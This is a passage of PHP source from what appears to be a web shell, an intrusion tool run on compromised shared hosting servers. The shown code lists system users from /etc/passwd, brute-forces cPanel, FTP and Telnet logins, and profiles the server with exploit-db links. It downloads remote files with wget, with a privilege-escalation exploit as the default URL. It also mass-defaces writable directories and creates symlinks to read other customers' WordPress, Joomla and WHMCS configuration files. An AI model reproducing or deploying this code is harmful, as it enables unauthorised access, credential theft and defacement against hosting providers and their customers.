  1990. <td align=center><textarea spellcheck='false'
  1991. class=textarea_edit name=username rows=25 cols=35 class=box><?php
  1992. if($os != "win") {
  1993. if(@file('/etc/passwd')) {
  1994. $users = file('/etc/passwd');
  1995. foreach($users as $user) {
  1996. $user = explode(':', $user);
  1997. echo $user[0] . "\n";
  1998. }
  1999. } else {
  2000. $temp = "";
  2001. $val1 = 0;
  2002. $val2 = 1000;
  2003. for(; $val1 <= $val2; $val1++) {
  2004. $uid = @posix_getpwuid($val1);
  2005. if($uid)
  2006. $temp .= join(':', $uid) . "\n";
  2007. }
  2008. $temp = trim($temp);
  2009. if($file5 = fopen("test.txt", "w")) {
  2010. fputs($file5, $temp);
  2011. fclose($file5);
  2012. $file = fopen("test.txt", "r");
  2013. while(!feof($file)) {
  2014. $s = fgets($file);
  2015. $matches = array();
  2016. $t = preg_match('/\/(.*?)\:\//s', $s,
  2017. $matches);
  2018. $matches = str_replace("home/",
  2019. "", $matches[1]);
  2020. if(strlen($matches) > 12 || strlen($matches) ==
  2021. 0 || $matches == "bin" || $matches == "etc/X11/fs" ||
  2022. $matches == "var/lib/nfs" || $matches ==
  2023. "var/arpwatch"
  2024. || $matches == "var/gopher" || $matches == "sbin" ||
  2025. $matches == "var/adm" || $matches == "usr/games" ||
  2026. $matches == "var/ftp" || $matches == "etc/ntp" ||
  2027. $matches == "var/www" || $matches == "var/named")
  2028. continue;
  2029. echo $matches;
  2030. }
  2031. fclose($file);
  2032. }
  2033. }
  2034. }
  2035. ?></textarea></td><td align=center><textarea
  2036. spellcheck='false' class=textarea_edit name=password rows=25 cols=35
  2037. class=box></textarea></td>
  2038. </tr>
  2039. <tr>
  2040. <td align=center colspan=2>Guess options :
  2041. <label><input
  2042. name="cracktype" type="radio" value="cpanel"
  2043. checked> Cpanel(2082)</label><label><input
  2044. name="cracktype" type="radio"
  2045. value="ftp">
  2046. Ftp(21)</label><label><input name="cracktype"
  2047. type="radio" value="telnet">
  2048. Telnet(23)</label></td>
  2049. </tr>
  2050. <tr>
  2051. <td align=center colspan=2>Timeout delay : <input
  2052. type="text" name="delay" value=5
  2053. class=sbox></td>
  2054. </tr>
  2055. <tr>
  2056. <td align=center colspan=2><input type="submit"
  2057. value="O" class=but></td>
  2058. </tr>
  2059. </table>
  2060. </form>
  2061. </center>
  2062. <?php
  2063. } else {
  2064. if(empty($_POST['username']) || empty($_POST['password']))
  2065. echo "<center>Please Enter The Users or Password
  2066. List</center>";
  2067. else {
  2068. $userlist = explode("\n", $_POST['username']);
  2069. $passlist = explode("\n", $_POST['password']);
  2070. if($_POST['cracktype'] == "ftp") {
  2071. foreach($userlist as $user) {
  2072. $pureuser = trim($user);
  2073. foreach($passlist as $password) {
  2074. $purepass = trim($password);
  2075. ftp_check($_POST['target'], $pureuser, $purepass,
  2076. $connect_timeout);
  2077. }
  2078. }
  2079. }
  2080. if($_POST['cracktype'] == "cpanel" ||
  2081. $_POST['cracktype'] == "telnet") {
  2082. if($cracktype == "telnet") {
  2083. $cpanel_port = "23";
  2084. } else
  2085. $cpanel_port = "2082";
  2086. foreach($userlist as $user) {
  2087. $pureuser = trim($user);
  2088. echo "<b><font face=Iceland
  2089. style=\"font-size:
  2090. 9pt\" color=#008000> [ - ] </font><font face=Iceland
  2091. style=\"font-size: 9pt\" color=#FF0800>
  2092. Processing user $pureuser
  2093. ...</font></b><br><br>";
  2094. foreach($passlist as $password) {
  2095. $purepass = trim($password);
  2096. cpanel_check($_POST['target'], $pureuser,
  2097. $purepass, $connect_timeout);
  2098. }
  2099. }
  2100. }
  2101. }
  2102. }
  2103. echo "</div>";
  2104. }
  2105. function get_users() {
  2106. $userz = array();
  2107. $user = file("/etc/passwd");
  2108. foreach($user as $userx => $usersz) {
  2109. $userct = explode(":", $usersz);
  2110. array_push($userz, $userct[0]);
  2111. }
  2112. if(!$user) {
  2113. if($opd = opendir("/home/")) {
  2114. while(($file = readdir($opd)) !== false) {
  2115. array_push($userz, $file);
  2116. }
  2117. }
  2118. closedir($opd);
  2119. }
  2120. $userz = implode(', ', $userz);
  2121. return $userz;
  2122. }
  2123. function exploit_details() {
  2124. global $os;
  2125. echo "<div id=result style='color:yellow;'><center>
  2126. <h2>Exploit Server Details</h2><hr /><br
  2127. /><br /><table class=table
  2128. style='color:yellow;text-align:center'><tr><td>
  2129. OS: <a style='color:7171C6;text-decoration:none;' target=_blank
  2130. href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description="
  2131. . php_uname(s) . "'>" . php_uname(s) .
  2132. "</td></tr>
  2133. <tr><td>PHP Version : <a
  2134. style='color:7171C6;text-decoration:none;' target=_blank
  2135. href='?phpinfo'>" . phpversion() . ".</td></tr>
  2136. <tr><td>Kernel Release : <font
  2137. color=7171C6>" . php_uname(r) .
  2138. "</font></td></tr>
  2139. <tr><td>Kernel Version : <font
  2140. color=7171C6>" . php_uname(v) .
  2141. "</font></td></td>
  2142. <tr><td>Machine : <font
  2143. color=7171C6>" . php_uname(m) .
  2144. "</font></td</tr>
  2145. <tr><td>Server Software : <font
  2146. color=7171C6>" . $_SERVER['SERVER_SOFTWARE'] .
  2147. "</font></td</tr><tr>";
  2148. if(function_exists('apache_get_modules')) {
  2149. echo "<tr><td style='text-align:left;'>Loaded
  2150. Apache
  2151. modules : <br /><br /><font color=7171C6>";
  2152. echo implode(', ', apache_get_modules());
  2153. echo "</font></tr></td>";
  2154. }
  2155. if($os == 'win') {
  2156. echo "<tr><td style='text-align:left;'>Account
  2157. Setting : <font color=7171C6><pre>" . cmd('net
  2158. accounts') . "</pre></td></tr>
  2159. <tr><td style='text-align:left'>User Accounts :
  2160. <font color=7171C6><pre>" . cmd('net
  2161. user') . "</pre></td></tr>
  2162. ";
  2163. }
  2164. if($os == 'nix') {
  2165. echo "<tr><td style='text-align:left'>Distro :
  2166. <font color=7171C6><pre>" . cmd('cat
  2167. /etc/*-release') . "</pre></font></td></tr>
  2168. <tr><td style='text-align:left'>Distr name :
  2169. <font color=7171C6><pre>" . cmd('cat
  2170. /etc/issue.net') . "</pre></font></td></tr>
  2171. <tr><td style='text-align:left'>GCC : <font
  2172. color=7171C6><pre>" . cmd('whereis
  2173. gcc') . "</pre></td></tr>
  2174. <tr><td style='text-align:left'>PERL : <font
  2175. color=7171C6><pre>" . cmd('whereis
  2176. perl') . "</pre></td></tr>
  2177. <tr><td style='text-align:left'>PYTHON :
  2178. <font
  2179. color=7171C6><pre>" . cmd('whereis
  2180. python') . "</pre></td></tr>
  2181. <tr><td style='text-align:left'>JAVA : <font
  2182. color=7171C6><pre>" . cmd('whereis
  2183. java') . "</pre></td></tr>
  2184. <tr><td style='text-align:left'>APACHE :
  2185. <font
  2186. color=7171C6><pre>" . cmd('whereis
  2187. apache') . "</pre></td></tr>
  2188. <tr><td style='text-align:left;'>CPU : <br
  2189. /><br /><pre><font color=7171C6>" . cmd('cat
  2190. /proc/cpuinfo') . "</font></pre></td></tr>
  2191. <tr><td style='text-align:left'>RAM : <font
  2192. color=7171C6><pre>" . cmd('free
  2193. -m') . "</pre></td></tr>
  2194. <tr><td style='text-align:left'> User Limits :
  2195. <br /><br /><font
  2196. color=7171C6><pre>" . cmd('ulimit
  2197. -a') . "</pre></td></tr>";
  2198. $useful = array(
  2199. 'gcc',
  2200. 'lcc',
  2201. 'cc',
  2202. 'ld',
  2203. 'make',
  2204. 'php',
  2205. 'perl',
  2206. 'python',
  2207. 'ruby',
  2208. 'tar',
  2209. 'gzip',
  2210. 'bzip',
  2211. 'bzip2',
  2212. 'nc',
  2213. 'locate',
  2214. 'suidperl'
  2215. );
  2216. $uze = array();
  2217. foreach($useful as $uzeful) {
  2218. if(cmd("which $uzeful")) {
  2219. $uze[] = $uzeful;
  2220. }
  2221. }
  2222. echo "<tr><td
  2223. style='text-align:left'>Useful
  2224. : <br /><font color=7171C6><pre>";
  2225. echo implode(', ', $uze);
  2226. echo "</pre></td></tr>";
  2227. $downloaders = array(
  2228. 'wget',
  2229. 'fetch',
  2230. 'lynx',
  2231. 'links',
  2232. 'curl',
  2233. 'get',
  2234. 'lwp-mirror'
  2235. );
  2236. $uze = array();
  2237. foreach($downloaders as $downloader) {
  2238. if(cmd("which $downloader")) {
  2239. $uze[] = $downloader;
  2240. }
  2241. }
  2242. echo "<tr><td
  2243. style='text-align:left'>Downloaders : <br /><font
  2244. color=7171C6><pre>";
  2245. echo implode(', ', $uze);
  2246. echo "</pre></td></tr>";
  2247. echo "<tr><td style='text-align:left'>Users
  2248. : <br /><font
  2249. color=7171C6><pre>" . wordwrap(get_users()) .
  2250. "</pre</font>></td></tr>
  2251. <tr><td style='text-align:left'>Hosts :
  2252. <br /><font color=7171C6><pre>" . cmd('cat
  2253. /etc/hosts') .
  2254. "</pre></font></td></tr>";
  2255. }
  2256. echo "</table><br /><br /><hr /><br
  2257. /><br />";
  2258. }
  2259. function remote_file_check_ui() {
  2260. echo "<div id=result><center><h2>Remote File
  2261. Check</h2><hr /><br /><br />
  2262. <table class=tbl><form
  2263. method='POST'><tr><td>URL : <input size=50
  2264. name='rem_web'
  2265. value='http://www.facebook.com/'></td></tr>
  2266. <tr><td><font color=red>Input File's Names in
  2267. TextArea</font></tr></td><tr><td><textarea
  2268. spellcheck='false' class='textarea_edit' cols=50 rows=30
  2269. name='tryzzz'>
  2270. x.php
  2271. .env
  2272. robots.txt
  2273. .htacces
  2274. nekopoi.mp4
  2275. c99.php
  2276. r57.php
  2277. B374k.php
  2278. </textarea></td></tr>
  2279. <tr><td><br>
  2280. <input type='submit' value='submit' class='input_big'>
  2282. <br><br></td></tr></form></table><br
  2283. ><br><hr><br><br>";
  2284. }
  2285. function remote_file_check_bg() {
  2286. set_time_limit(0);
  2287. $rtr = array();
  2288. echo "<div id=result><center><h2>Scanner
  2289. Report</h2><hr /><br /><br /><table
  2290. class=tbl>";
  2291. $webz = $_POST['rem_web'];
  2292. $uri_in = $_POST['tryzzz'];
  2293. $r_xuri = trim($uri_in);
  2294. $r_xuri = explode("\n", $r_xuri);
  2295. foreach($r_xuri as $rty) {
  2296. $urlzzx = $webz . $rty;
  2297. if(function_exists('curl_init')) {
  2298. echo "<tr><td
  2299. style='text-align:left'><font
  2300. color=orange>Checking : </font> <font color=7171C6> $urlzzx
  2301. </font></td>";
  2302. $ch = curl_init($urlzzx);
  2303. curl_setopt($ch, CURLOPT_NOBODY, true);
  2304. curl_exec($ch);
  2305. $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  2306. curl_close($ch);
  2307. if($status_code == 200) {
  2308. echo "<td style='text-align:left'><font
  2309. color=yellow> Found....</font></td></tr>";
  2310. } else {
  2311. echo "<td style='text-align:left'><font
  2312. color=red>Not Found...</font></td></tr>";
  2313. }
  2314. } else {
  2315. echo "<font color=red>cURL Not Found
  2316. </font>";
  2317. break;
  2318. }
  2319. }
  2320. echo "</table><br /><br /><hr /><br
  2321. /><br /></div>";
  2322. }
  2323. function remote_download_ui() {
  2324. echo "<div id=result><center><h2>Remote File
  2325. Download</h2><hr><br><br><table
  2326. class=tbl><form method='GET'><input type=hidden name='path'
  2327. value=" . getcwd() . "><tr><td><select
  2328. style='color:yellow; background-color:black; border:1px solid #666;'
  2329. name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
  2330. <tr><td>URL <input size=50 name='rurlfile'
  2331. value='https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c'></td></tr>
  2332. <tr><td><input type='submit' class='input_big'
  2333. value='submit'
  2334. /></td></tr></form></table><br><br><hr><br><br></div>";
  2335. }
  2336. function remote_download_bg() {
  2337. chdir($_GET['path']);
  2338. global $os;
  2339. $opt = $_GET['type_r_down'];
  2340. $rt_ffile = $_GET['rurlfile'];
  2341. $name = basename($rt_ffile);
  2342. echo "<div id=result>";
  2343. switch($opt) {
  2344. case "WGET":
  2345. if($os != 'win') {
  2346. cmd("wget $rt_ffile");
  2347. alert("Downloaded Successfully...");
  2348. } else {
  2349. alert("Its Windows OS... WGET is not
  2350. available");
  2351. }
  2352. break;
  2353. case "cURL":
  2354. if(function_exists('curl_init')) {
  2355. $ch = curl_init($rt_ffile);
  2356. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2357. $data = curl_exec($ch);
  2358. curl_close($ch);
  2359. file_put_contents($name, $data);
  2360. alert("Download succeeded");
  2361. } else {
  2362. alert("cURL Not Available");
  2363. }
  2364. break;
  2365. }
  2366. echo "</div>";
  2367. }
  2368. function hex_encode_ui() {
  2369. if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) {
  2370. $tyx = $_POST['tyxxx'];
  2371. $rezultzz = $_POST['hexinp'];
  2372. switch($tyx) {
  2373. case "Encode":
  2374. $rzul = PREG_REPLACE("'(.)'e",
  2375. "dechex(ord('\\1'))", $rezultzz);
  2376. echo "<div
  2377. id=result><center><h2>HEXADECIMAL
  2378. ENCODER</h2><hr><br><br>
  2379. <textarea class='textarea_edit' spellcheck=false
  2380. cols=60
  2381. rows=10>$rzul</textarea>
  2382. <br /><br /><form
  2383. method='POST'><select style='color:yellow; background-color:black;
  2384. border:1px solid #666;'
  2385. name='tyxxx'><option>Encode</option><option>Decode</option></select>
  2386. Input : <input name='hexinp' size=50 value='input
  2387. here'><input type=submit value='submit'
  2388. /><br><br><hr><br><br></div>";
  2389. break;
  2390. case "Decode":
  2391. $rzul = PREG_REPLACE("'([\S,\d]{2})'e",
  2392. "chr(hexdec('\\1'))", $rezultzz);
  2393. echo "<div
  2394. id=result><center><h2>HEXADECIMAL
  2395. ENCODER</h2><hr><br><br>
  2396. <textarea class='textarea_edit' spellcheck=false
  2397. cols=60
  2398. rows=10>$rzul</textarea>
  2399. <br /><br /><form
  2400. method='POST'><select style='color:yellow; background-color:black;
  2401. border:1px solid #666;'
  2402. name='tyxxx'><option>Encode</option><option>Decode</option></select>
  2403. Input : <input name='hexinp' size=50 value='input
  2404. here'><input type=submit value='submit'
  2405. /><br><br><hr><br><br></div>";
  2406. break;
  2407. }
  2408. } else {
  2409. echo "<div
  2410. id=result><center><h2>HEXADECIMAL
  2411. ENCODER</h2><hr /><br /><br />
  2412. <textarea class='textarea_edit' spellcheck=false cols=60
  2413. rows=10>Here visible Your Result</textarea>
  2414. <br /><br /><form method='POST'><select
  2415. style='color:yellow; background-color:black; border:1px solid #666;'
  2416. name='tyxxx'><option>Encode</option><option>Decode</option></select>
  2417. Input : <input name='hexinp' size=50 value='input
  2418. here'><input type=submit value='submit' /><br
  2419. /><br /><hr /><br /><br /></div>";
  2420. }
  2421. }
  2422. function killme() {
  2423. global $self;
  2424. echo "<div id=result><center><h2>Good Bye
  2425. Dear</h2><hr />Where Are U Going? :(
  2426. <br><br><br><hr><br><br>";
  2427. $me = basename($self);
  2428. unlink($me);
  2429. }
  2430. function ftp_anonymous_ui() {
  2431. echo "<div id='result'><center><h2>Anonymous
  2432. FTP
  2433. Scanner</h2><hr></center>
  2434. <table class=tbl><form method='GET'><tr>
  2435. <td><textarea name='ftp_anonz' cols=40 rows=25
  2436. class='textarea_edit' required>
  2438. ftp.google.com
  2439. ftp.r00t.com
  2440. ftp.nekopoi.org</textarea></td></tr>
  2441. <tr><td><input class='input_big' type='submit'
  2442. value='submit'></td></tr></form></table><br><br><hr><br><br>";
  2443. }
  2444. function ftp_anonymous_bg() {
  2445. echo "<div
  2446. id=result><center><h2>Result</h2></center><hr
  2447. /><br /><br /><table class=table>";
  2448. $ftp_list = $_GET['ftp_anonz'];
  2449. $xftpl = trim($ftp_list);
  2450. $xftpl = explode("\n", $xftpl);
  2451. foreach($xftpl as $xftp) {
  2452. $xftp = str_replace("ftp://", "", $xftp);
  2453. $conn_ftp = ftp_connect($xftp);
  2454. $success = ftp_login($conn_ftp, "anonymous",
  2455. "");
  2456. if($success) {
  2457. echo "<tr><td><font
  2458. color=7171C6>$xftp</font></td><td><font
  2459. color=yellow>Successfull</font></td></tr>";
  2460. } else {
  2461. echo "<tr><td><font
  2462. color=7171C6>$xftp</font></td><td><font
  2463. color=red>Failed</font></td></tr>";
  2464. }
  2465. }
  2466. echo "</table><br /><br /><hr /><br
  2467. /><br />";
  2468. }
  2469. function mass_deface_ui() {
  2470. echo "<div id=result><center><h2>Mass
  2471. Deface</h2><hr /><br /><br /><table
  2472. class=tbl><form method='GET'><input name='mm_path'
  2473. type='hidden'
  2474. value=" . $_GET['path'] . "><tr><td>Name
  2475. : <input size=40 name='mass_name'></td></tr>
  2476. <tr><td><textarea name='mass_cont' cols=80 rows=25
  2477. class='textarea_edit'></textarea></td></tr><tr><td><input
  2478. class='input_big' type=submit value='submit'
  2479. /></td></tr></form></table><br /><br
  2480. /><hr /><br /><br /></div>";
  2481. }
  2482. function mass_deface_bg() {
  2483. global $sep;
  2484. $d_path = $_GET['mm_path'];
  2485. chdir($d_path);
  2486. $d_file = $_GET['mass_name'];
  2487. $d_conten = $_GET['mass_cont'];
  2488. if(is_dir($d_path)) {
  2489. chdir($d_path);
  2490. $d_dirs = array();
  2491. if($handle = opendir($d_path)) {
  2492. while(($item = readdir($handle)) !== FALSE) {
  2493. if($item == ".") {
  2494. continue;
  2495. }
  2496. if($item == "..") {
  2497. continue;
  2498. }
  2499. if(is_dir($item)) {
  2500. array_push($d_dirs, $item);
  2501. }
  2502. }
  2503. }
  2504. }
  2505. echo "<div
  2506. id=result><center><h2>Result</h2></center><hr
  2507. /><br /><br /><table class=tbl>";
  2508. foreach($d_dirs as $d_dir) {
  2509. $xd_path = getcwd() . "$sep$d_dir$sep$d_file";
  2510. if(is_writable($d_dir)) {
  2511. $handle = fopen($xd_path, "wb");
  2512. if($handle) {
  2513. fwrite($handle, $d_conten);
  2514. }
  2515. }
  2516. echo "<tr><td><font
  2517. color=yellow>$xd_path</font></td></tr>";
  2518. }
  2519. echo "</table><br /><br /><hr /><br
  2520. /><br /></div>";
  2521. }
  2522. function symlinkg($usernamexx, $domainxx) {
  2523. symlink('/home/' . $usernamexx .
  2524. '/public_html/vb/includes/config.php',
  2525. 'Ensikology/' . $domainxx . '
  2526. =>vBulletin1.txt');
  2527. symlink('/home/' . $usernamexx . '/public_html/includes/config.php',
  2528. 'Ensikology/' . $domainxx . '
  2529. =>vBulletin2.txt');
  2530. symlink('/home/' . $usernamexx .
  2531. '/public_html/forum/includes/config.php', 'Ensikology/' . $domainxx . '
  2532. =>vBulletin3.txt');
  2533. symlink('/home/' . $usernamexx .
  2534. '/public_html/cc/includes/config.php',
  2535. 'Ensikology/' . $domainxx . '
  2536. =>vBulletin4.txt');
  2537. symlink('/home/' . $usernamexx . '/public_html/inc/config.php',
  2538. 'Ensikology/' . $domainxx . '
  2539. =>mybb.txt');
  2540. symlink('/home/' . $usernamexx . '/public_html/config.php',
  2541. 'Ensikology/'
  2542. . $domainxx . '
  2543. =>Phpbb1.txt');
  2544. symlink('/home/' . $usernamexx .
  2545. '/public_html/forum/includes/config.php', 'Ensikology/' . $domainxx . '
  2546. =>Phpbb2.txt');
  2547. symlink('/home/' . $usernamexx . '/public_html/wp-config.php',
  2548. 'Ensikology/' . $domainxx . '
  2549. =>Wordpress1.txt');
  2550. symlink('/home/' . $usernamexx . '/public_html/blog/wp-config.php',
  2551. 'Ensikology/' . $domainxx . '
  2552. =>Wordpress2.txt');
  2553. symlink('/home/' . $usernamexx . '/public_html/configuration.php',
  2554. 'Ensikology/' . $domainxx . '
  2555. =>Joomla1.txt');
  2556. symlink('/home/' . $usernamexx .
  2557. '/public_html/blog/configuration.php',
  2558. 'Ensikology/' . $domainxx . '
  2559. =>Joomla2.txt');
  2560. symlink('/home/' . $usernamexx .
  2561. '/public_html/joomla/configuration.php', 'Ensikology/' . $domainxx . '
  2562. =>Joomla3.txt');
  2563. symlink('/home/' . $usernamexx . '/public_html/whm/configuration.php',
  2564. 'Ensikology/' . $domainxx . '
  2565. =>Whm1.txt');
  2566. symlink('/home/' . $usernamexx .
  2567. '/public_html/whmc/configuration.php',
  2568. 'Ensikology/' . $domainxx . '
  2569. =>Whm2.txt');
  2570. symlink('/home/' . $usernamexx .
  2571. '/public_html/support/configuration.php', 'Ensikology/' . $domainxx . '
  2572. =>Whm3.txt');
  2573. symlink('/home/' . $usernamexx .
  2574. '/public_html/client/configuration.php', 'Ensikology/' . $domainxx . '
  2575. =>Whm4.txt');
  2576. symlink('/home/' . $usernamexx .
  2577. '/public_html/billings/configuration.php', 'Ensikology/' . $domainxx . '
  2578. =>Whm5.txt');
  2579. symlink('/home/' . $usernamexx .
  2580. '/public_html/billing/configuration.php', 'Ensikology/' . $domainxx . '
  2581. =>Whm6.txt');
  2582. symlink('/home/' . $usernamexx .
  2583. '/public_html/clients/configuration.php', 'Ensikology/' . $domainxx . '
  2584. =>Whm7.txt');
  2585. symlink('/home/' . $usernamexx .
  2586. '/public_html/whmcs/configuration.php', 'Ensikology/' . $domainxx . '
  2587. =>Whm8.txt');
  2588. symlink('/home/' . $usernamexx .
  2589. '/public_html/order/configuration.php', 'Ensikology/' . $domainxx . '
  2590. =>Whm9.txt');
  2591. symlink('/home/' . $usernamexx . '/public_html/admin/conf.php',
  2592. 'Ensikology/' . $domainxx . '
  2593. =>5.txt');
  2594. symlink('/home/' . $usernamexx . '/public_html/admin/config.php',
  2595. 'Ensikology/' . $domainxx . '
  2596. =>4.txt');
  2597. symlink('/home/' . $usernamexx . '/public_html/conf_global.php',
  2598. 'Ensikology/' . $domainxx . '
  2599. =>invisio.txt');
  2600. symlink('/home/' . $usernamexx . '/public_html/include/db.php',
  2601. 'Ensikology/' . $domainxx . '
  2602. =>7.txt');
  2603. symlink('/home/' . $usernamexx . '/public_html/connect.php',
  2604. 'Ensikology/' . $domainxx . '
  2605. =>8.txt');
  2606. symlink('/home/' . $usernamexx . '/public_html/mk_conf.php',
  2607. 'Ensikology/' . $domainxx . '
  2608. =>mk-portale1.txt');
  2609. symlink('/home/' . $usernamexx . '/public_html/include/config.php',
  2610. 'Ensikology/' . $domainxx . '
  2611. =>12.txt');
  2612. symlink('/home/' . $usernamexx . '/public_html/settings.php',
  2613. 'Ensikology/' . $domainxx . '
  2614. =>Smf.txt');
  2615. symlink('/home/' . $usernamexx .
  2616. '/public_html/includes/functions.php',
  2617. 'Ensikology/' . $domainxx . '
  2618. =>phpbb3.txt');
  2619. symlink('/home/' . $usernamexx . '/public_html/include/db.php',
  2620. 'RaBiitch/' . $domainxx . '
  2621. =>infinity.txt');
  2622. }
  2623. function config_grabber_bg() {
  2624. global $sym_htaccess, $sym_php_ini;
  2625. mkdir('RaBiitch', 0777);
  2626. symlink("/", "RaBiitch/root");
  2627. $htaccess = fopen('RaBiitch/.htaccess', 'wb');
  2628. fwrite($htaccess, $sym_htaccess);
  2629. $php_ini_x = fopen('Ensikology/php.ini', 'wb');
  2630. fwrite($php_ini_x, $sym_php_ini);
  2631. $usr = explode("\n", $_POST['user_z_list']);
  2632. foreach($usr as $uzer) {
  2633. $u_er = trim($uzer);
  2634. symlinggg($u_er);
  2635. }
  2636. echo "<script>window.open('Ensikology/',
  2637. '_blank');</script>";
  2638. alert('Config Grab compted. Check configs in direcory Ensikology');
  2639. }
  2640. if(isset($_POST['user_z_list'])) {
  2641. config_grabber_bg();
  2642. }
  2643. function config_grabber_ui() {
  2644. if(file('/etc/passwd')) {
  2645. ?><script>alert("/etc/named.conf Not Found, Its
  2646. alternative method.");</script><div
  2647. id=result><center><h2>Config
  2648. Grabber</h2><hr><br><br><table
  2649. class=tbl><form
  2650. method=POST><tr><td><textarea spellcheck=false
  2651. class='textarea_edit' rows=15 cols=60 name=user_z_list><?php
  2652. $users = file('/etc/passwd');
  2653. foreach($users as $user) {
  2654. $user = explode(':', $user);
  2655. echo $user[0] . "\n";
  2656. }
  2657. ?></textarea></td></tr><tr><td><input
  2658. type='submit' class='input_big'
  2659. value='submit'/></td></tr></form></table><br
  2660. /><br
  2661. /><hr /><br /><br /><hr /></div><?php
  2662. } else {
  2663. alert(" File Not Found : /etc/passwd ");
  2664. }
  2665. }
  2666. function symlinggg($user) {
  2667. symlink('/home/' . $usernamexx .
  2668. '/public_html/blog/configuration.php',
  2669. "Ensikology/" . $user . " =>blog/configuration.php");
  2670. symlink('/home/' . $user . '/public_html/forum/includes/config.php',
  2671. "Ensikology/" . $user . "
  2672. =>forum/includes/config.php");
  2673. symlink("/home/" . $user .
  2674. "/public_html/wp-config.php", "Ensikology/" . $user .
  2675. " =>wp-config.php");
  2676. symlink("/home/" . $user .
  2677. "/public_html/wordpress/wp-config.php", "Ensikology/" .
  2678. $user . " =>wordpress/wp-config.php");
  2679. symlink("/home/" . $user .
  2680. "/public_html/configuration.php", "Ensikology/" . $user
  2681. .
  2682. " =>configuration.php");
  2683. symlink("/home/" . $user .
  2684. "/public_html/blog/wp-config.php", "Ensikology/" . $user
  2685. . " =>blog/wp-config.php");
  2686. symlink("/home/" . $user .
  2687. "/public_html/joomla/configuration.php", "Ensikology/" .
  2688. $user . " =>joomla/configuration.php");
  2689. symlink("/home/" . $user .
  2690. "/public_html/vb/includes/config.php", "Ensikology/" .
  2691. $user . " =>vb/includes/config.php");
  2692. symlink("/home/" . $user .
  2693. "/public_html/includes/config.php", "Ensikology/" .
  2694. $user
  2695. . " =>includes/config.php");
  2696. symlink("/home/" . $user .
  2697. "/public_html/conf_global.php", "Ensikology/" . $user .
  2698. " =>conf_global.php");
  2699. symlink("/home/" . $user .
  2700. "/public_html/inc/config.php", "Ensikology/" . $user .
  2701. " =>inc/config.php");
  2702. symlink("/home/" . $user .
  2703. "/public_html/config.php", "Ensikology/" . $user .
  2704. "
  2705. =>config.php");
  2706. symlink("/home/" . $user .
  2707. "/public_html/Settings.php", "Ensikology/" . $user .
  2708. " =>/Settings.php");
  2709. symlink("/home/" . $user .
  2710. "/public_html/sites/default/settings.php", "Ensikology/"
  2711. . $user . " =>sites/default/settings.php");
  2712. symlink("/home/" . $user .
  2713. "/public_html/whm/configuration.php", "Ensikology/" .
  2714. $user . " =>whm/configuration.php");
  2715. symlink("/home/" . $user .
  2716. "/public_html/whmcs/configuration.php", "Ensikology/" .
  2717. $user . " =>whmcs/configuration.php");
  2718. symlink("/home/" . $user .
  2719. "/public_html/support/configuration.php", "Ensikology/"
  2720. .
  2721. $user . " =>support/configuration.php");
  2722. symlink("/home/" . $user .
  2723. "/public_html/whmc/WHM/configuration.php", "Ensikology/"
  2724. . $user . " =>whmc/WHM/configuration.php");
  2725. symlink("/home/" . $user .
  2726. "/public_html/whm/WHMCS/configuration.php",
  2727. "Ensikology/"
  2728. . $user . "
  2729. =>whm/WHMCS/configuration.php");
  2730. symlink("/home/" . $user .
  2731. "/public_html/whm/whmcs/configuration.php",
  2732. "Ensikology/"
  2733. . $user . "
  2734. =>whm/whmcs/configuration.php");
  2735. symlink("/home/" . $user .
  2736. "/public_html/support/configuration.php", "Ensikology/"
  2737. .
  2738. $user . " =>support/configuration.php");
  2739. symlink("/home/" . $user .
  2740. "/public_html/clients/configuration.php", "Ensikology/"
  2741. .
  2742. $user . " =>clients/configuration.php");
  2743. symlink("/home/" . $user .
  2744. "/public_html/client/configuration.php", "Ensikology/" .
  2745. $user . " =>client/configuration.php");
  2746. symlink("/home/" . $user .
  2747. "/public_html/clientes/configuration.php", "Ensikology/"
  2748. . $user . " =>clientes/configuration.php");
  2749. symlink("/home/" . $user .
  2750. "/public_html/cliente/configuration.php", "Ensikology/"
  2751. .
  2752. $user . " =>cliente/configuration.php");
  2753. symlink("/home/" . $user .
  2754. "/public_html/clientsupport/configuration.php",
  2755. "Ensikology/" . $user . "
  2756. =>clientsupport/configuration.php");
  2757. symlink("/home/" . $user .
  2758. "/public_html/billing/configuration.php", "Ensikology/"
  2759. .
  2760. $user . " =>billing/configuration.php");
  2761. symlink("/home/" . $user .
  2762. "/public_html/admin/config.php", "Ensikology/" . $user .
  2763. " =>admin/config.php");
  2764. }
  2765. function sym_xxx() {
  2766. global $sym_htaccess, $sym_php_ini;
  2767. mkdir('Ensikology', 0777);
  2768. symlink("/", "Ensikology/root");
  2769. $htaccess = @fopen('Ensikology/.htaccess', 'w');
  2770. fwrite($htaccess, $sym_htaccess);
  2771. $php_ini_x = fopen('Ensikology/php.ini', 'w');
  2772. fwrite($php_ini_x, $sym_php_ini);
  2773. $akps = implode(file("/etc/named.conf"));
  2774. if(!$akps) {
  2775. config_grabber_ui();
  2776. } else {
  2777. $usrd = array();
  2778. foreach($akps as $akp) {
  2779. if(eregi("zone", $akp)) {
  2780. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  2781. flush();
  2782. if(strlen(trim($akpzz[1][0])) > 2) {
  2783. $user =
  2784. posix_getpwuid(@fileowner("/etc/valiases/" . $akpzz[1][0]));
  2785. symlinkg($akpzz[1][0], $user['name']);
  2786. flush();
  2787. }
  2788. }
  2789. }
  2790. }
  2791. }
  2792. function sym_link() {
  2793. global $sym_htaccess, $sym_php_ini;
  2794. cmd('rm -rf ENSKLG');
  2795. mkdir('ENSKLG', 0755);
  2796. $usrd = array();
  2797. $akps = implode(file("/etc/named.conf"));
  2798. $htaccess = fopen('ENSKLG/.htaccess', 'w');
  2799. fwrite($htaccess, $sym_htaccess);
  2800. $php_ini_x = fopen('ENSKLG/php.ini', 'w');
  2801. fwrite($php_ini_x, $sym_php_ini);
  2802. symlink("/", "ENSKLG/root");
  2803. if(!$file) {
  2804. echo "<script>alert('Bind File /etc/passwd Not Found.
  2805. Its alternative Method')</script>";
  2806. echo "<div
  2807. id=result><center><h2>SymLink</h2></center><hr
  2808. /><br /><br /><table
  2809. class='table'><tr><th>Users</th><th>Exploit</th></tr>";
  2810. $users = file('/etc/passwd');
  2811. foreach($users as $user) {
  2812. $user = explode(':', $user);
